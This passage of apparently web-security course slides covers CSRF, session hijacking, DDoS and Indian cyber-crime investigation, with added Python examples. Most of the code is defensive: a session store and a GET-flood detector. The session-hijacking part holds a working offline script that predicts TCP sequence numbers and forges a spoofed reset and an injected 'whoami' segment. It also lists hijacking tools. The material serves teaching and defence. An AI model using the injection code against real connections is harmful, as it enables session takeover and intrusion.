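        # Steps 1/2 of the diagram: the login response carries a session cookie.
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": user, "csrf": None, "issued": 0.0}
        return {"sid": sid}

    def transfer_form(self, cookies, now):
        # GET /transfer: mint a random token, store it in this user's session
        # and put it in a hidden field of the form the site itself generates.
        s = self.sessions[cookies["sid"]]
        s["csrf"], s["issued"] = secrets.token_urlsafe(32), now
        return {"to": "", "amount": "", "csrf_token": s["csrf"]}

    def transfer(self, method, cookies, form, now):
        # POST /transfer: the state-changing request CSRF targets.
        if method != "POST":
            return 405, "state changes only via POST"   # GET/HEAD stay "safe"
        s = self.sessions.get(cookies.get("sid"))
        if s is None:
            return 401, "not logged in"
        if self.require_token:
            if s["csrf"] is None or now - s["issued"] > TOKEN_TTL:
                return 403, "token missing or expired"
            # constant-time compare; the token is tied to this session only
            if not hmac.compare_digest(s["csrf"], form.get("csrf_token", "")):
                return 403, "bad token"
            s["csrf"] = None  # single use
        amount = int(form["amount"])
        if self.balances[s["user"]] < amount:
            return 400, "insufficient funds"
        self.balances[s["user"]] -= amount
        self.balances[form["to"]] += amount
        return 200, "transferred"


class Browser:
    """Cookie jar keyed by origin. submit() is the root cause of CSRF: the
    cookies for an origin go out with every request sent to that origin,
    no matter which page built the request."""

    def __init__(self):
        self.jar = {}

    def visit_login(self, origin, site, user):
        self.jar[origin] = site.login(user)

    def submit(self, origin, site, method, form, now):
        return site.transfer(method, self.jar.get(origin, {}), form, now)


def attacker_page():
    # Steps 3/4: the malicious site returns an auto-posting form aimed at the bank.
    return {"to": "mallory", "amount": "50"}


def run_attack(require_token, form_open=False, now=1000.0):
    """Return (HTTP status of the forged request, alice's balance afterwards)."""
    bank, browser = Bank(require_token), Browser()
    browser.visit_login("https://bank.example", bank, "alice")
    if form_open:  # victim has the real form open, so a valid token exists
        bank.transfer_form(browser.jar["https://bank.example"], now)
    # Step 5: the victim's browser submits the attacker's form, cookies included.
    status, _ = browser.submit("https://bank.example", bank, "POST", attacker_page(), now)
    return status, bank.balances["alice"]


def run_legitimate(now=1000.0, delay=0.0):
    """The genuine flow: fetch the form (gets a token), then submit it."""
    bank, browser = Bank(True), Browser()
    browser.visit_login("https://bank.example", bank, "alice")
    form = bank.transfer_form(browser.jar["https://bank.example"], now)
    form.update({"to": "mallory", "amount": "25"})
    status, _ = browser.submit("https://bank.example", bank, "POST", form, now + delay)
    return status, bank.balances["alice"]


if __name__ == "__main__":
    print(run_attack(require_token=False))            # (200, 50)  forgery succeeds
    print(run_attack(require_token=True))             # (403, 100) no token at all
    print(run_attack(require_token=True, form_open=True))  # (403, 100) attacker cannot read it
    print(run_legitimate())                           # (200, 75)
    print(run_legitimate(delay=TOKEN_TTL + 1))        # (403, 100) token expired
```

The model deliberately has no SameSite cookie attribute or Origin/Referer check; those are additional layers, not replacements for the token, and the vulnerable branch is the same code path with the token check removed.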
Session HIJACKING
What is session hijacking?
Session hijacking is the exploitation of a valid computer session, which
typically involves stealing the victim's session cookie.
What is a cookie?
• A cookie, also known as a web cookie or HTTP cookie, is a small piece of text
stored by the user's browser.
• A cookie is sent in a Set-Cookie header by the web server to the web browser
on the client side.
• A cookie is static and is sent back by the browser unchanged (in the Cookie
header) every time it accesses the server. This is why whoever presents a
valid session cookie is treated as the logged-in user.
Types of session hijacking

1 ) Active :-
In an active attack, an attacker finds an active session and takes it over.

2 ) Passive : -
In a passive attack, the attacker hijacks a session but sits back and watches,
recording all the traffic that is sent back and forth.
Session hijacking working…
(A video example of session hijacking was shown at this point.)

Session Hijacking
 Levels of Session Hijacking
 Session Hijacking Steps
 Session Hijacking Tools
 Types of Session Hijacking
 Countermeasures

Steps in Session Hijacking (network level)
1) Place yourself between the victim and the target (you must be able to
sniff the network)
2) Monitor the flow of packets
3) Predict the sequence number
4) Kill the connection to the victim's machine
5) Take over the session
6) Start injecting packets to the target server
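The six steps above, carried out on constructed TCP segments, as an added example rather than anything from the slides. Everything here is hypothetical: the addresses, ports and the single "sniffed" victim-to-server segment are made up, and nothing is put on the wire (that would need raw sockets and a sniffing position on the path). What it shows is the arithmetic of step 3 (the next in-window sequence number is the last observed one plus the bytes consumed), the spoofed RST of step 4, and a correctly checksummed injected segment for step 6. Because modern stacks randomise initial sequence numbers, prediction only works from observation, which is why step 1 demands a sniffing position.

```python
"""TCP sequence prediction, connection reset and segment injection, offline."""
import socket
import struct

TCP_HDR = "!HHIIHHHH"   # sport, dport, seq, ack, offset/flags, window, csum, urg
FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10


def ones_complement_sum(data):
    """16-bit one's-complement sum with end-around carry (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def tcp_checksum(src_ip, dst_ip, segment):
    """Checksum over the IPv4 pseudo-header plus the whole segment.
    Returns 0 when the segment already carries a correct checksum."""
    pseudo = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
              + struct.pack("!BBH", 0, 6, len(segment)))
    return (~ones_complement_sum(pseudo + segment)) & 0xFFFF


def build_segment(src_ip, dst_ip, sport, dport, seq, ack, flags, payload=b"", window=65535):
    """Build a TCP segment (no options) with a valid checksum."""
    offset_flags = (5 << 12) | flags          # 5 words of header, then flags
    header = struct.pack(TCP_HDR, sport, dport, seq, ack, offset_flags, window, 0, 0)
    csum = tcp_checksum(src_ip, dst_ip, header + payload)
    return header[:16] + struct.pack("!H", csum) + header[18:] + payload


def parse_segment(segment):
    sport, dport, seq, ack, off_flags, window, csum, urg = struct.unpack(TCP_HDR, segment[:20])
    offset = (off_flags >> 12) * 4
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": off_flags & 0x1FF, "window": window, "payload": segment[offset:]}


def predict_next(observed):
    """Step 3: the sender's next segment must carry seq = last seq + bytes
    consumed (payload length, plus one for SYN or FIN). Its ack number stays
    the same until the peer sends more data."""
    consumed = len(observed["payload"]) + int(bool(observed["flags"] & (SYN | FIN)))
    return (observed["seq"] + consumed) & 0xFFFFFFFF, observed["ack"]


def hijack(victim_ip, server_ip, sniffed_from_victim, inject_payload):
    """Steps 3-6 from one sniffed victim->server segment (step 2)."""
    obs = parse_segment(sniffed_from_victim)
    seq, ack = predict_next(obs)
    # Step 4: RST to the victim, spoofed as the server. To be accepted its seq
    # must be what the victim expects next from the server, i.e. the ack number
    # the victim just sent.
    rst_to_victim = build_segment(server_ip, victim_ip, obs["dport"], obs["sport"],
                                  obs["ack"], seq, RST | ACK)
    # Steps 5/6: spoof the victim towards the server with the predicted numbers.
    injected = build_segment(victim_ip, server_ip, obs["sport"], obs["dport"],
                             seq, ack, PSH | ACK, inject_payload)
    return {"predicted_seq": seq, "rst_to_victim": rst_to_victim, "injected": injected}


# Constructed sample (not a real capture): victim 10.0.0.5:40000 -> server
# 10.0.0.20:23, seq 1000, ack 5000, carrying 12 bytes of a telnet login.
VICTIM, SERVER = "10.0.0.5", "10.0.0.20"
SNIFFED = build_segment(VICTIM, SERVER, 40000, 23, 1000, 5000, PSH | ACK, b"USER victim\n")


def demo():
    result = hijack(VICTIM, SERVER, SNIFFED, b"whoami\n")
    inj = parse_segment(result["injected"])
    return result["predicted_seq"], inj["seq"], tcp_checksum(VICTIM, SERVER, result["injected"]) == 0


if __name__ == "__main__":
    print(demo())   # (1012, 1012, True)
```

On a live network the same arithmetic is done by tools such as Hunt or Juggernaut from sniffed traffic; the defence is the same as in the countermeasures that follow, namely encrypting the session so an injected segment carries nothing the application will accept.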


Session Hijacking Levels

Session hijacking takes place at two levels:

• Network level hijacking

• Application level hijacking

Network level hijacking is the interception of packets during transmission
between the client and the server in a TCP or UDP session (the steps listed
above).

Application level hijacking is about gaining control of an HTTP user session
by obtaining the session ID, for example by stealing the cookie.
Some common tools used for Session Hijacking
The following are a few that belong to this category:

• Juggernaut
• Hunt
• TTY Watcher
• IP Watcher
• T-Sight
• Paros HTTP Hijacker
Counter Measures for Session Hijacking
• Use encryption
• Use a secure protocol (SSL/TLS, HTTPS) so the cookie cannot be sniffed in
transit
• Set a timeout so the session expires when inactive
• Limit incoming connections where possible
• Expire the session if the browsing agent changes
• Minimize remote access
• Provide logout functionality that invalidates the session on the server

Counter Measures for Session Hijacking (Cont….)
• Create a new session ID after successful login, rather than keeping the
pre-login ID
• Use long, random session IDs
• Expire the session if the operating system changes
• Force re-authentication, or set up step-up authentication, for sensitive
operations
• Expire the session if the device changes (WebSocket)
• CAPTCHA to prevent automated attempts
• Educate the employees
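A server-side session store that applies several of the countermeasures above (long random IDs, a fresh ID after login, an idle timeout, expiry when the browsing agent changes, and a logout that really destroys the session), then replays a cookie theft against it. This is an added example, not code from the slides; the store, its API, the 15-minute timeout and the simulated user agents are assumptions, and the time is passed in explicitly so it runs offline. The Secure and HttpOnly cookie flags in set_cookie_header() are likewise added as what a practitioner sets alongside these measures.

```python
"""Session store applying the hijacking countermeasures, with a replayed theft."""
import secrets

IDLE_TIMEOUT = 15 * 60   # assumed inactivity limit, in seconds


class SessionStore:
    def __init__(self):
        self._sessions = {}   # sid -> {"user", "ua", "last_seen"}

    def new_session(self, user_agent, now, user=None):
        # Long IDs: 32 random bytes (256 bits), so guessing one is hopeless.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "ua": user_agent, "last_seen": now}
        return sid

    def login(self, old_sid, user, user_agent, now):
        # Issue a fresh ID once the user has authenticated and drop the
        # pre-login one, so an ID learnt before login is worthless afterwards.
        self._sessions.pop(old_sid, None)
        return self.new_session(user_agent, now, user=user)

    def validate(self, sid, user_agent, now):
        """Return (user, reason). Any failure destroys the session, which
        forces the genuine user to re-authenticate (and notice)."""
        s = self._sessions.get(sid)
        if s is None:
            return None, "unknown session"
        if now - s["last_seen"] > IDLE_TIMEOUT:
            self.logout(sid)
            return None, "idle timeout"
        if s["ua"] != user_agent:
            # Expire if the browsing agent changes. Weak on its own: an
            # attacker who sniffed the cookie usually sniffed the UA too.
            self.logout(sid)
            return None, "user agent changed"
        s["last_seen"] = now
        return s["user"], "ok"

    def logout(self, sid):
        # Server-side invalidation; clearing the cookie in the browser alone
        # would leave a stolen copy valid.
        self._sessions.pop(sid, None)


def set_cookie_header(sid):
    # Assumed flags: Secure (HTTPS only) and HttpOnly (unreadable from script).
    return f"Set-Cookie: sid={sid}; Secure; HttpOnly; SameSite=Lax; Path=/"


def simulate():
    """Replay a login, a cookie theft from another client, and an idle session."""
    store = SessionStore()
    victim_ua, attacker_ua = "Mozilla/5.0 (X11; Linux)", "curl/8.0"
    pre = store.new_session(victim_ua, now=0)
    sid = store.login(pre, "alice", victim_ua, now=1)
    out = {}
    out["old_id_after_login"] = store.validate(pre, victim_ua, 2)[1]
    out["victim"] = store.validate(sid, victim_ua, 10)[1]
    out["stolen_cookie"] = store.validate(sid, attacker_ua, 11)[1]   # attacker replays it
    out["victim_after_theft"] = store.validate(sid, victim_ua, 12)[1]  # must log in again
    sid2 = store.login(store.new_session(victim_ua, 20), "alice", victim_ua, 21)
    out["idle"] = store.validate(sid2, victim_ua, 21 + IDLE_TIMEOUT + 1)[1]
    return out


if __name__ == "__main__":
    for k, v in simulate().items():
        print(f"{k:>22}: {v}")
```

Note what the simulation does not cover: an attacker replaying the cookie from the same browser type within the idle window is indistinguishable from the user, which is why transport encryption (so the cookie is never exposed) and re-authentication for dangerous operations remain necessary.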


Distributed Denial of Service
What is Distributed Denial of Service?
 A denial-of-service attack (DoS attack) is a cyber-attack where the
perpetrator seeks to make a machine or network resource unavailable to
its intended users by temporarily or indefinitely disrupting services of
a host connected to the Internet. Denial of service is typically
accomplished by flooding the targeted machine or resource with
superfluous requests in an attempt to overload systems and prevent some
or all legitimate requests from being fulfilled. In a distributed
denial-of-service attack (DDoS) the flood comes from many sources at once,
which makes it far harder to block by address.
Types of DDoS
Volume Based Attacks
 Includes UDP floods, ICMP floods, and other spoofed-packet floods. The
attack's goal is to saturate the bandwidth of the attacked site, and
magnitude is measured in bits per second (bps).
Protocol Attacks
 Includes SYN floods, fragmented packet attacks, Ping of Death, Smurf
DDoS and more. This type of attack consumes actual server resources, or
those of intermediate communication equipment such as firewalls and
load balancers, and is measured in packets per second (pps).
Application Layer Attacks
 Includes low-and-slow attacks, GET/POST floods, attacks that target
Apache, Windows or OpenBSD vulnerabilities and more. Comprised of
seemingly legitimate and innocent requests, the goal of these attacks is to
crash the web server, and the magnitude is measured in requests per
second (rps).
LIVE DEMO
Prevention and Mitigation Strategy
 The first thing to do in DDoS mitigation is to identify normal conditions for
network traffic by defining "traffic patterns", which is necessary for threat
detection and alerting. DDoS mitigation also requires classifying incoming
traffic to separate human traffic from human-like bots and hijacked web
browsers. This is done by comparing signatures and examining different
attributes of the traffic, including IP addresses, cookie variations,
HTTP headers, and JavaScript footprints.
 One technique is to pass network traffic addressed to a potential target
network through high-capacity networks with "traffic scrubbing" filters.
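The first two steps above (establish a traffic pattern, then separate bots from humans by comparing attributes) applied to an application-layer GET flood, as an added example that is not from the slides. The access-log format and every line in it are constructed inside the script so it runs offline; a real deployment would parse the web server's own log and take its baseline from historical traffic rather than from a cutoff second that is already known, as the normal_until parameter assumes here. Rates are in requests per second, the unit the slides give for application-layer attacks.

```python
"""Baseline-and-deviation detection of a GET flood in a constructed access log."""
import statistics
from collections import Counter, defaultdict

UAS = ('Mozilla/5.0 (Windows NT 10.0)', 'Mozilla/5.0 (Macintosh)', 'Mozilla/5.0 (X11; Linux)')


def constructed_log():
    """Constructed sample, not real traffic: 70 s of ordinary browsing
    (4-6 req/s from 40 addresses and three browsers, all carrying a session
    cookie); from t=60 a flood of 400 req/s from eight addresses that share
    one user agent, hit one path and never send a cookie."""
    lines, n = [], 0
    for t in range(70):
        for i in range(4 + t % 3):
            n += 1
            lines.append(f'{t} 203.0.113.{n % 40 + 1} GET /page{i} 200 "{UAS[n % 3]}" cookie=yes')
        if t >= 60:
            for i in range(400):
                lines.append(f'{t} 198.51.100.{i % 8 + 1} GET / 200 "python-requests/2.31" cookie=no')
    return lines


def parse(line):
    # Constructed format: <second> <ip> <method> <path> <status> "<user agent>" cookie=yes|no
    ts, ip, method, path, status, rest = line.split(" ", 5)
    ua, cookie = rest.rsplit(" ", 1)
    return {"ts": int(ts), "ip": ip, "method": method, "path": path,
            "status": int(status), "ua": ua.strip('"'), "cookie": cookie == "cookie=yes"}


def baseline(records, until_ts):
    """Normal conditions: mean and spread of requests per second before until_ts."""
    per_sec = Counter(r["ts"] for r in records if r["ts"] < until_ts)
    counts = [per_sec[t] for t in range(until_ts)]
    return statistics.mean(counts), statistics.pstdev(counts)


def flagged_seconds(records, mean, sd, k=5.0):
    """Seconds whose rate departs from the traffic pattern. The 2*mean floor
    stops a very flat baseline (sd near 0) from alerting on ordinary noise."""
    threshold = max(mean + k * sd, 2 * mean)
    per_sec = Counter(r["ts"] for r in records)
    return sorted(t for t, n in per_sec.items() if n > threshold)


def suspect_clients(records, flagged, min_requests=50):
    """Within the flagged window, separate humans from bots by comparing
    attributes per address: volume, cookie presence, path and UA variety."""
    window = set(flagged)
    per_ip = defaultdict(list)
    for r in records:
        if r["ts"] in window:
            per_ip[r["ip"]].append(r)
    suspects = {}
    for ip, rs in per_ip.items():
        no_cookie = sum(not r["cookie"] for r in rs) / len(rs)
        one_path = len({r["path"] for r in rs}) == 1
        one_ua = len({r["ua"] for r in rs}) == 1
        if len(rs) >= min_requests and no_cookie > 0.9 and one_path and one_ua:
            suspects[ip] = {"requests": len(rs), "ua": rs[0]["ua"]}
    return suspects


def analyse(lines, normal_until=60):
    """Run the whole pipeline and return a report suitable for alerting."""
    records = [parse(line) for line in lines]
    mean, sd = baseline(records, normal_until)
    flagged = flagged_seconds(records, mean, sd)
    return {"baseline_rps": mean, "flagged_seconds": flagged,
            "suspects": suspect_clients(records, flagged)}


if __name__ == "__main__":
    report = analyse(constructed_log())
    print(f"baseline {report['baseline_rps']:.1f} req/s; flood seconds {report['flagged_seconds']}")
    for ip, info in sorted(report["suspects"].items()):
        print(f"block {ip}: {info['requests']} requests, UA {info['ua']}")
```

The attribute test is deliberately conjunctive: a high request count alone would also catch a busy corporate proxy, and a missing cookie alone would catch every first-time visitor, so an address is only listed when several bot-like attributes coincide. Real floods from a large botnet spread the volume thinly per address, which is where the upstream scrubbing mentioned above takes over.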
Law and Investigations
INVESTIGATION
Challenges in the investigation of cyber crime (website crime)
Investigation of cyber-crimes differs from conventional investigation because:
 The incident takes place in the virtual world
 It is borderless/transnational
 There are issues of jurisdiction
 It is hard to connect the accused with the machine/computer
 There is a lack of enthusiasm in reporting cyber crime
The essential requirements for investigation are:
 Immediate reporting of breaches
 Adequate tools
 Trained investigators
 Computer-literate witnesses
 Assistance of forensic experts
 Immediate investigation

Common procedure of website crime investigation

 WHOIS and domain details: if the domain is active it must have a working
email address and payment details; contact the registrar, who can give the
domain's IP address, mobile number and payment instrument.
 The email ID used to buy the hosting server is important because from it
police can obtain the creation IP, alternate email ID, mobile number and
IP logs.
 A law enforcement agency in India can demand information such as IP logs
and the login credentials of the accused for investigation under Section 91
of the CrPC 1973; for details of Section 91 of the CrPC 1973 refer to the
annexure.
 Law enforcement agencies can perform a detailed investigation of cyber
crime cases through the Internet Protocol Detail Record (IPDR) of the
network used. The IPDR can be obtained from the ISP of the concerned
network. A sample IPDR is shown in the figure.
FIGURE : Sample of notice under Section 91 CrPC 1973.
Figure : Sample of IPDR
Crimes and Laws Relating to Website.
 Harassment via fake public profile on social networking
site.
 Online Hate Community.
 Email Account Hacking.
 Web Defacement.
 Introducing Viruses, Worms, Backdoors, Rootkits, Trojans,
Bugs.
 Cyber Terrorism.
 Phishing and Email Scams.
 Theft of Confidential Information.
WEBSITE HACKING CASE STUDY
 Hacking and defacement of Assam police website.
 Hacker hacks into a financial website.
 Indian Army website hacked.
 ISRO website hack.
 Bazee.com
 eBay account takeover
 Incometaxpune.com redirection to pornographic content